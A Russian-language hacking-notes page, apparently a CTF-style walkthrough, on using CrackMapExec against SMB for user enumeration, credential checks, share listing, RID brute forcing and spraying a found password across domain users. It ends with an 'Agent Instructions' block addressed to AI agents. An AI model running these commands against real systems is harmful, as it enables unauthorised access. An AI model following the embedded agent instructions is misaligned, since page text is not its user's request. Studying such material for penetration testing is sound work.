> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/ports-and-services/smb-445/crackmapexec-smb-tool.md).

# CrackMapExec (инструмент SMB)

> CrackMapExec (CME) — это инструмент для аудита безопасности в средах Active Directory, используемый после эксплуатации. Он проверяет учетные данные, перечисляет SMB-экспозицию, выявляет распространенные слабые места и может выполнять удаленные команды при наличии достаточных привилегий.

### **Перечисление системы**

Чтобы определить системы в сети и узнать имя домена:

```bash
crackmapexec smb 10.10.10.10
```

Это предоставляет информацию о целевом SMB-сервере, включая домен и доступные службы.

<figure><img src="/files/10159508a4090ae4f8bb2911883a906f0bbfc2e8" alt=""><figcaption></figcaption></figure>

#### Перечисление пользователей

```bash
crackmapexec smb 10.10.10.10 -u '' -p '' --users
```

### **Проверка учетных данных**

Чтобы проверить, действительна ли пара имя пользователя/пароль:

```bash
crackmapexec smb 10.10.10.10 -u '<user>' -p '<password>'
```

Если учетные данные верны, CME подтвердит доступ к целевой системе.

<figure><img src="/files/9e9b9f3cd9c68fef994669f370a4bafa6e774005" alt=""><figcaption></figcaption></figure>

### **Проверка учетных данных с повышенными правами (PWNED)**

Если пользователь входит в группу **Remote Management Users** группы, учетная запись может подключаться напрямую к целевой системе. Чтобы проверить эти учетные данные:

```bash
crackmapexec smb 10.10.10.10 -u '<user>' -p '<password>'
```

Ответ, указывающий на доступ PWNED, означает, что у пользователя есть повышенные привилегии, потенциально позволяющие удаленное выполнение.

<figure><img src="/files/ca78f64a63be6e000344470de368084d250aee9c" alt=""><figcaption></figcaption></figure>

### **Перечисление общих ресурсов и разрешений**

Чтобы изучить разрешения и сетевые общие ресурсы, доступные с предоставленными учетными данными:

```bash
crackmapexec smb 10.10.10.10 -u '<user>' -p '<password>' --shares
```

Это отображает доступные общие ресурсы и разрешения, связанные с пользователем.

<figure><img src="/files/d5fe6958260f2c311a204b36c9a0591ef21f6479" alt=""><figcaption></figcaption></figure>

### Грубый перебор RID

#### Чтобы определить пользователей домена, запустите атаку грубого перебора RID:

```bash
crackmapexec smb 10.10.11.35 -u 'Guest' -p "" --rid-brute
```

> У `--rid-brute` параметр выполняет **атаку грубого перебора** против **RID (относительных идентификаторов)** в домене Windows. RID — это часть идентификатора безопасности Windows и обычно используется для идентификации учетных записей пользователей и групп.

<figure><img src="/files/ce7f5585bf656514a82035f0cdb39e81c7579c7c" alt=""><figcaption></figcaption></figure>

Вот список найденных пользователей:

```
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
```

#### Проверка пользователя

Проверьте найденный пароль на всех перечисленных пользователях:

```bash
crackmapexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
```

Пользователь **michael.wrightson** использует этот пароль.

<figure><img src="/files/eedc7f24662929ab21cf33dad2208e6e152c69a4" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/ports-and-services/smb-445/crackmapexec-smb-tool.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
